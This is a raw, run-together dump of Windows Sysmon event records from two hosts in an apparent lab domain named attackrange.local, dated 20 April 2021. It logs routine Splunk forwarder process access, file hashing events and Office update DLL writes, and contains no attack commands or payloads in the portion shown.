AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000049393Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.759{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E287C9F7AA14AFEA3423FE6183311DDE,SHA256=3CDB16BC609ABAA9182D360A36197FF83A1E6C541801DAFC91322A4340E6E5BD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000049392Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.274{85C0FFC9-EB05-607E-D006-00000000BB01}20043156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000049391Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.165{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5DEC5B83EFE371C35B1F6AA002CFDFA4,SHA256=91F3DAC745D93B7C495321867107F4021D51C99934F55AD8C2FAE51B06823E1F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000049390Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.165{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EB05-607E-D006-00000000BB01}2004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049389Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.165{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049388Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.165{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049387Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.165{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049386Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.165{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049385Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.165{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049384Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.165{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049383Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.165{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049382Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.165{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049381Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.165{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049380Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.165{85C0FFC9-B7EC-607E-0500-00000000BB01}4161008C:\Windows\system32\csrss.exe{85C0FFC9-EB05-607E-D006-00000000BB01}2004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049379Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.165{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EB05-607E-D006-00000000BB01}2004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049378Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:57.166{85C0FFC9-EB05-607E-D006-00000000BB01}2004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000063577Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:58.706{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=F985E1E51BD4FEB45E4931E1523E80EA,SHA256=E168C793E8F8BB7D1EAC66F2B963AAC5E0DD0FE2CCEBAB9CCFC61E8C70CE4293,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000063576Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:58.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\RTMPLTFM.dll2021-04-20 14:53:58.362 11241100x800000000000000063575Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:58.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Rtmcodecs.dll2021-04-20 14:53:58.362 11241100x800000000000000063574Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:58.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\rdpqoemetrics.dll2021-04-20 14:53:58.362 11241100x800000000000000063573Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:58.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\lyncDesktopViewModel.dll2021-04-20 14:53:58.347 11241100x800000000000000063572Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:58.362{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\SLINTL.DLL2021-04-20 14:53:58.347 11241100x800000000000000063571Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:58.347{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ORGCHART.CHM2021-04-20 14:53:58.347 11241100x800000000000000063570Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:58.347{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\assembly\GAC_64\Microsoft.Office.Access.BusinessDataCatalog\16.0.0.0__71E9BCE111E9429C\Microsoft.Office.Access.BusinessDataCatalog.DLL2021-04-20 14:53:58.347 11241100x800000000000000063569Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:58.347{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\assembly\GAC_MSIL\Microsoft.AnalysisServices.AdomdClient\13.0.0.0__89845DCD8080CC91\Microsoft.AnalysisServices.AdomdClient.dll2021-04-20 14:53:58.347 11241100x800000000000000063568Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:58.347{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\assembly\GAC_MSIL\Microsoft.AnalysisServices.SPClient.Interfaces\13.0.0.0__89845DCD8080CC91\Microsoft.AnalysisServices.SPClient.Interfaces.DLL2021-04-20 14:53:58.347 11241100x800000000000000063567Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:58.347{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\assembly\GAC_MSIL\Microsoft.BusinessData\16.0.0.0__71E9BCE111E9429C\Microsoft.BusinessData.dll2021-04-20 14:53:58.347 11241100x800000000000000063566Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:58.347{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\assembly\GAC_MSIL\Microsoft.Office.BusinessApplications.Diagnostics\16.0.0.0__71E9BCE111E9429C\microsoft.office.businessapplications.diagnostics.dll2021-04-20 14:53:58.347 11241100x800000000000000063565Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:58.331{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\assembly\GAC_MSIL\Microsoft.Office.BusinessData.Intl\16.0.0.0__71E9BCE111E9429C\microsoft.office.businessdata.intl.dll2021-04-20 14:53:58.331 11241100x800000000000000063564Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:58.331{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\assembly\GAC_MSIL\Microsoft.Office.BusinessData\16.0.0.0__71E9BCE111E9429C\microsoft.office.businessdata.dll2021-04-20 14:53:58.331 23542300x800000000000000063563Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:58.284{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2DE4A35230FDDAF26B1C5267E3BB082C,SHA256=1487432C1FD3C6A01D67BCD3D9C39866DC9B25426F286AFDE568DF21DECB08A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063562Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:58.097{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2EA104FD220FAF4174BA980ED363BEB,SHA256=E88E703157D1A8250D5BB104C4CDB09BEFF04E4E6AC965F69A36DAF3EEAF21C5,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000063561Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:58.081{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LyncDesktopSmartBitmapResources.dll2021-04-20 14:53:58.081 10341000x800000000000000049423Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:58.509{85C0FFC9-EB06-607E-D206-00000000BB01}23801460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049422Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:58.384{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EB06-607E-D206-00000000BB01}2380C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049421Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:58.384{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049420Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 